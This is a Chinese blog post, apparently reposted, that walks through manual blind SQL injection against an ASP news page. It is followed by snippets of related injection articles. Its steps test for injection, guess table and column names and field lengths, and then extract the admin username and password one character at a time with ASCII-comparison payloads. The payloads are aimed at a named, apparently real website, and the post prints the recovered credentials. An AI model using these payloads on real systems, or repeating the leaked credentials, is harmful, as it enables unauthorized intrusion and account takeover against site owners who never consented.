2. 程式人生 > >實戰演示手工SQL注入之半猜解查詢

實戰演示手工SQL注入之半猜解查詢

阿新 發佈:2019-01-25

第一步:判斷環境,尋找注入點

確定注入點 : 
數字型:   用'號報錯 就有注入的希望     或者 and 1=1  and 1=2 檢測  一個正常 一個返回不正常 95%存在注入點用 



第二步:猜解表名:

and exists (select * from 表名),如果存在該表名,返回正常,不存在返回錯誤;


第三步:猜解欄位

and exists (selsect 欄位名 from 表名)


第四步:猜解欄位長度(即猜解賬號密碼位數)

and (selsect top 1 len(欄位名 )from 表名)>0(從0開始依次隨意遞增,直到頁面顯示不正常,最後用等=確定位數)


mysql測試失敗,原因暫時不知;

第五步:折半法猜出--重要關鍵的一環      猜密碼   =0
and (select top 1 asc(mid(欄位,1,1)) from 表名)>0    

and(select top 1 asc(mid(admin_name,1,1))from admin)>0

http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,1,1))from admin)=97
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,2,1))from admin)=100
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,3,1))from admin)=109
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,4,1))from admin)=105
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,5,1))from admin)=110

97,100,109,105,110     使用者名稱:admin     密碼:liuguoping


and(select top 1 asc(mid(admin_pass,1,1))from admin)>0

http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,1,1))from admin)=108
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,2,1))from admin)>105
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,3,1))from admin)>117
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,4,1))from admin)>103
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,5,1))from admin)>117
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,6,1))from admin)>111
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,7,1))from admin)>112
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,8,1))from admin)>105
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,9,1))from admin)>110
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,10,1))from admin)>103

108,105,117,103,117,111,112,105,110,103     

猜解第N位的ASCII碼 >0取值從負數到正數都有可能,當然常見的密碼都是數字加字母的組合,他們的ASCII值在0-128之間,將值替換為這之間的值,如果正確,則返回正常頁面,如果不是責返回出錯,將正確的ASCII碼放入ASCII轉換器中轉成十進位制字元將N分別替換為 1 2 3 4 ...     反覆猜解即可得出欄位每一個位數的值而得到密碼 。

第六步:用工具轉碼工具,把ASCII轉換成字元。 


相關推薦

實戰演示手工SQL注入查詢

第一步:判斷環境,尋找注入點確定注入點 : 數字型:   用'號報錯 就有注入的希望     或者 and 1=1  and 1=2 檢測  一個正常 一個返回不正常 95%存在注入點用 第二步:猜解表名:and exists (select * from 表名),如果存在該

SQL注入--表的

步驟 表名—>列名—>列長度—>具體值 例如:注入點 http://www.XX.com/index.asp?id=1 猜解表名:http://www.XX.com/index.asp?id=1 and exists select

簡單的sql注入2 / writeup (手工注入,純屬練手)

多測試幾次可以發現,空格被註釋了,百度解決方法,用/**/代替空格的位置, 構造語句1'/**/or/**/'1'='1 確認為單引號注入 用order by 確認select欄位數,以確定union的欄位數 可得,只有一個欄位 獲取資料庫  1'/**

SQL手工注入---表的

手工注入過程 找到注入點→表名→列名→列長度→列值 猜解表名 http://www.xxx.com/index.asp?id=1 and exists(select * from 猜測的表名) exi

手工sql注入簡單入門

1、判斷是否可以注入: 數字型: 1.1在引數後面加一個引號',如果頁面報數字number錯誤,則一定不是sql注入點;如果報資料庫比如mysql、oracle之類的錯誤,則是一個sql注入點。 1.2 在引數後面加上 依次加上 and 1=1 和 and 1=2,如果加上 and 1=1 還能正常顯示原

CFT每日一題簡單的SQL注入

首先,輸入1 嘗試一下 然後爆出ID 加 個 單引號 嘗試 ,出現報錯介面 然後 大概猜測程式碼是  select xx from XX where id='' 用and測試 發現了有過濾,經過多測實驗後,發現去掉空格就可以 然後開始構造,我們可以使用/**/

sql注入與防止SQL注入引數化處理

sql注入的兩種情況: 操作程式碼: import pymysql user = input('使用者名稱: ').strip() pwd = input('密碼: ').strip() # 連結 conn = pymysql.connect(host='localhost', user='ro

SQL注入騷姿勢小記 & 替換 繞過

https://mp.weixin.qq.com/s/ORsciwsBGQJhFdKqceprSw 1、IN之騷 這個我也偶然發現的,也不知前輩們有沒有早已總結好的套路了。w3school上對in操作符的介紹: http://www.w3school.com.cn/sql/sql_in.

SQL注入——sqli-labs-master 下載與安裝

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/84262285 注意事項,寫在前面。 php版本一定要設定成 7 以下,7之後的mysql_都改成了mysqli_**了,用7以上版本的話會報錯 **********

張小白的滲透路(二)——SQL注入漏洞原理詳

SQL注入漏洞簡介 亂七八糟的就不多說了,自己百度去 SQL注入原理 想要更好的學習SQL注入,那麼我們就必須要深入的瞭解每種資料庫的SQL語法及特性。下面通過一個經典的萬能密碼的例子帶大家來撥開一下SQL注入漏洞的神祕面紗。本次環境為:DVWA的第一關(DVW

實驗吧Web-中-簡單的sql注入2

輸入union select、order by這些關鍵字會提示SQLi detected! 說明對於關鍵字有防護 輸入1 union也會提示SQLi detected! 但是如果去掉空格:1union,則會返回正常,1'and'1'='1(無空格)也返回正常 所以可能是過濾了空格。

實驗吧 | 簡單的sql注入3

模糊測試結果: 1)查詢成功返回 Hello ,查詢失敗無回顯。 2)查詢id = 1 ,2 ,3均有回顯。 2)再看一下現在在哪個庫裡面吧! payload3 = http://ctf5.shiyanbar.com/web/index_3.php?id=0

簡單的sql注入2WP

                     這裡我們會用到tamper,是python寫的,sqlmap一般自帶,主要的作用是繞過WAF 空格被過濾可以使用space2comment.py,過濾系統對大小寫敏感可以使用randomcase.py等等流程和簡單的sql注入之3是一樣的,不過加了–tamper而已

Python實戰編寫Burp “sql注入”外掛(一)

    前言:上一篇文章(利用python開發Burp Suite外掛 https://blog.csdn.net/xuandao_ahfengren/article/details/85109223) 簡單介紹瞭如何配置burpsuite外掛開發環境和burp su

SQL注入逗號攔截繞過

目前所知博主僅知的兩個方法 [一]case when then mysql> select * from lbcms_admin where adminname like "%a%" union select 1,2,3,4,5,6,7,case whe

SQL注入註釋

//  這裡以MySQL為例子 select name,pass from tbAdmin where name='admin' and pass='123456' 輸入:admin' or 1=1# SQL變成下面這個樣子: select name,pass from t

sql注入寬位元組注入

Bugku上看到一道這方面的題,從網上看了不少資料,談一談自己的認識。                      當我們在位址列輸入單引號時頁面並沒有報錯,         說明單引號應該被過濾了,轉義為 \'  防止注入                 

SQL注入報錯型注入

介紹 聯合查詢可以把我們想要的資料展示在網頁上,替代網頁上原有的資料內容;而今天我們要討論的是,網頁上沒有展示查詢結果的地方,也就是說select語句執行結果不能出現在網頁上,我們需要讓執行結果出現在其它地方,出現在哪呢?出現在報錯語句中。 資料庫返回到頁面

搭建DVWA測試環境和SQL注入SQLmap入門

DVWA是一款滲透測試的演練系統,在圈子裡是很出名的。如果你需要入門,並且找不到合適的靶機,那我就推薦你用

sqli-labs—————Sql注入盲注講解

盲注何為盲注?盲注就是在sql注入過程中,sql語句執行的選擇後,選擇的資料不能回顯到前端頁面。此時,我們需要利用一些方法進行判斷或者嘗試,這個過程稱之為盲注。盲注分為三類•基於布林SQL盲注•基於時間的SQL盲注•基於報錯的SQL盲注1、基於布林SQL盲注————構造邏輯判